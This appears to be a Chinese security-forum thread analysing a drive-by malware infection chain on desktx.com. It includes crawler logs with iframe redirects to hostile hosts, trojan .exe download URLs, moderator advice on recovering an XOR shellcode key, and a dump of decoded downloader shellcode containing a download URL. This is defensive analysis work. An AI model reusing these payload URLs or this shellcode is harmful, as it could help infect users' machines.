Log is generated by FreShow.
[wide]http://www.desktx.com/
    [script]http://www.desktx.com/templates/pc/indexflash.js
    [script]http://drmcmm.baidu.com/js/m.js
    [script]http://pagead2.googlesyndication.com/pagead/show_sdo.js
    [script]http://pagead2.googlesyndication.com/pagead/show_ads.js
    [script]http://pagead2.googlesyndication.com/pagead/show_ads.js
    [script]http://pagead2.googlesyndication.com/pagead/show_ads.js
    [script]http://pagead2.googlesyndication.com/pagead/show_ads.js
    [script]http://a.alimama.cn/inf.js
    [script]http://www.desktx.com/d/js/acmsd/thea30.js
        [frame]http://1saefw.qvod-setvp.com:171/360/index.html?id=3002
            [object]http://1saefw.qvod-setvp.com:171/360/me-.html?id=3002
                [object]http://1saefw.qvod-setvp.com:171/360/3002/a.jpg
                        [object]http://my.me-1.info:8886/Down/my/3002.exe
    [script]http://a.alimama.cn/inf.js
    [script]http://s61.cnzz.com/stat.php?id=1819431&web_id=1819431

用户系统信息：Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)

这个怎么分析啊，老大。
为什么我分析出来的是这样的？
关于:hxxp://www.desktx.com/解密的日志(全体输出 -  21):

Level  0>http://www.desktx.com/
Level  1>http://s61.cnzz.com/stat.php?id=1819431&web_id=1819431
Level  1>http://www.desktx.com/15
Level  1>http://www.desktx.com/d/js/acmsd/thea30.js
Level  2>http://s.click.taobao.com/t_1?i=qza2s3C%2Bww5izw%3D%3D&p=mm_10061672_0_0&n=11
Level  2>http://www.desktx.com/images/taoke/6.jpg
Level  2>http://s.click.taobao.com/t_1?i=qX1b5TNec%2FnWHA%3D%3D&p=mm_10061672_0_0&n=11
Level  2>http://www.desktx.com/images/taoke/5.jpg
Level  2>http://s.click.taobao.com/t_1?i=qvLKHhkY3Zaspg%3D%3D&p=mm_10061672_0_0&n=11
Level  2>http://www.desktx.com/images/taoke/4.jpg
Level  2>http://s.click.taobao.com/t_1?i=qXn%2F7rsvf0uEtw%3D%3D&p=mm_10061672_0_0&n=11
Level  2>http://www.desktx.com/images/taoke/3.jpg
Level  2>http://s.click.taobao.com/t_1?i=qXn8JFQp%2FC6B9g%3D%3D&p=mm_10061672_0_0&n=11
Level  2>http://www.desktx.com/images/taoke/2.jpg
Level  2>http://s.click.taobao.com/t_1?i=qv8UTd%2BySBbp2g%3D%3D&p=mm_10061672_0_0&n=11
Level  2>http://www.desktx.com/images/taoke/1.jpg
Level  1>http://pagead2.googlesyndication.com/pagead/show_ads.js
Level  1>http://www.desktx.com/+swfpath+
Level  1>http://pagead2.googlesyndication.com/pagead/show_sdo.js
Level  1>http://drmcmm.baidu.com/js/m.js
Level  1>http://www.desktx.com/templates/pc/indexflash.js

日志由 Redoce2.0第89次修正版于 2010-3-30 19:09:56 生成。

就是这个是怎么得到的啊，我很是不理解

Log is generated by FreShow.
[wide]http://www.desktx.com/
    [script]http://www.desktx.com/templates/pc/indexflash.js
    [script]http://drmcmm.baidu.com/js/m.js
        [frame]http://drmcmm.baidu.com/js/javascript:void((function(){var d=document;d.open(\'text/html\', \'replace\');'+H()+
        [ani]http://drmcmm.baidu.com/js/\''+c+"')
        [script]http://drmcmm.baidu.com/js/'+F(O,b)+'
    [script]http://pagead2.googlesyndication.com/pagead/show_sdo.js
    [script]http://pagead2.googlesyndication.com/pagead/show_ads.js
    [script]http://pagead2.googlesyndication.com/pagead/show_ads.js
    [script]http://pagead2.googlesyndication.com/pagead/show_ads.js
    [script]http://pagead2.googlesyndication.com/pagead/show_ads.js
    [script]http://a.alimama.cn/inf.js
    [script]http://www.desktx.com/d/js/acmsd/thea30.js
        [frame]http://qwqw4.3322.org:8800/ak47/21.html
            [frame]http://qwqw4.3322.org:8800/ak47/../b46/21/index.html
                [frame]http://qwqw4.3322.org:8800/ak47/../b46/21/qc.html
                    [script]http://qwqw4.3322.org:8800/ak47/../b46/21/rl.jpg
                        [object]http://pk2b.9966.org:8800/aaaa/t3/t21.exe
                    [script]http://qwqw4.3322.org:8800/ak47/../b46/21/y1.jpg
                    [script]http://qwqw4.3322.org:8800/ak47/../b46/21/tl.jpg
            [script]http://qwqw4.3322.org:8800/ak47/\"http://js.tongji.linezing.com/1561662/tongji.js\"
            [script]http://qwqw4.3322.org:8800/ak47/\"http://js.tongji.linezing.com/1530019/tongji.js\"
            [script]http://js.users.51.la/3652813.js
    [script]http://a.alimama.cn/inf.js
    [script]http://s61.cnzz.com/stat.php?id=1819431&web_id=1819431

这个网站跟http://chinalabs.com/ 应该是一个人挂的,请斑竹回答下,谢谢！
Log is generated by FreShow.
[wide]http://www.desktx.com/
    [script]http://www.desktx.com/templates/pc/indexflash.js
    [script]http://drmcmm.baidu.com/js/m.js
    [script]http://pagead2.googlesyndication.com/pagead/show_sdo.js
    [script]http://pagead2.googlesyndication.com/pagead/show_ads.js
    [script]http://pagead2.googlesyndication.com/pagead/show_ads.js
    [script]http://pagead2.googlesyndication.com/pagead/show_ads.js
    [script]http://pagead2.googlesyndication.com/pagead/show_ads.js
    [script]http://a.alimama.cn/inf.js
    [script]http://www.desktx.com/d/js/acmsd/thea30.js
        [frame]http://qwqw4.3322.org:8800/ak47/21.html
            [frame]http://qwqw4.3322.org:8800/ak47/../b46/21/index.html
                [frame]http://qwqw4.3322.org:8800/ak47/../b46/21/qc.html
                    [script]http://qwqw4.3322.org:8800/ak47/../b46/21/rl.jpg
                    [script]http://qwqw4.3322.org:8800/ak47/../b46/21/y1.jpg
                    [script]http://qwqw4.3322.org:8800/ak47/../b46/21/tl.jpg
            [script]http://qwqw4.3322.org:8800/ak47/\"http://js.tongji.linezing.com/1561662/tongji.js\"
            [script]http://qwqw4.3322.org:8800/ak47/\"http://js.tongji.linezing.com/1530019/tongji.js\"
            [script]http://js.users.51.la/3652813.js
    [script]http://s61.cnzz.com/stat.php?id=1819431&web_id=1819431

就是这个    [object]http://pk2b.9966.org:8800/aaaa/t3/t21.exe没找出来;
我想应该在shellcode里面,但是,经过我的分析然后把shellcode找出来了,但是两次ESC解密好象不成,找不到木马的下载地址,

XOR BD，密钥为bd

非常感谢版主的及时回答，参照版主的http://bbs.ikaka.com/showtopic-8632868.aspx文章但是出现的是，感觉应该是密钥的问题，但是不知道怎么样解密，同时想请教下密钥为bd 应该是从源文件中的YTavp88=%uBDBD%uBDBD%uBDBD%uBDBD%uBDBD%uBDBD%uBDBD%uBDBD%uEAEA找出来的吧还是其他的原因，非常期待版主解答，谢谢！

密钥可以通过猜，猜的话就是shellcode中有很多相同的内容的字符，还有就是enumxor的枚举，再就是使用od调试。使用enumxor枚举时需要将代码整理不能有多余的字符标点符号等。

非常感谢版主热情的回复，我自己再研究下，谢谢！
http://bbs.ikaka.com/showtopic-8630753.aspx 这有个，呵呵！

搞定了，呵呵~
//邋邋V鰩t??壎_GV窾VBBB?_d?婡 媝瓔h嬿jY杈愨鴋32hUserT婩 杈
嬭jY铻怡honhurlmT吚uhonhurlmT婩 鑾
嬭j
Y鑞怡hl32hshelT婩 鑟
嬭j
Y鐿怡侅
嬡伱€jjSjV\3繞€<u\Y.e荄xe3蒕QSWQ3缷FX?
凐椋恓jjjjh繱婩$?
塅`jPV(塅d婩`jjjjjPV,jjjhPV<塅x婲d€|磘 €|t€t粹雺唨荈p荈tjjj婩`PV8媶€j峃tQvpPv`V0v`V4vxV@孄3?蹃?嬏凐T}?
兝塍嬏嬞兠3繮QSPPPPPPWPPV媬T?
鑕hcvwhshdoT婩 ?塅<d?崰`jev<婩?3跾SSS衻8鑰8閡亁悙悙t?U嬱岪噼γ锠?
€?钃侅
孅兦?2t?荊c壯O荊爀椝荊 Q@?荊>?荊竔?荊?f犌G7G ?
鴇?婡 媝瓔h嬿jY鑄愨鴋32hUserT?鑅嬭jY?怡3WV?X描?[?笁_
f荊嗝S嬡Sj@hW婩 ?X肣V媢<媡.x鮒媣 ?蒊A????:謙了贎腭;u鏭媈$輋?K媈輯?奴^Y描蔹豺怍9鈣冓H{=2t?呥c壯OQ@?爀椝飺2鋽?
K
膷tWf
C粳踼馥歊??竔??f狘?瓨
鴢织汒Sfhttp://pk2b.9966.org:8800/aaaa/s3/s18.exeWW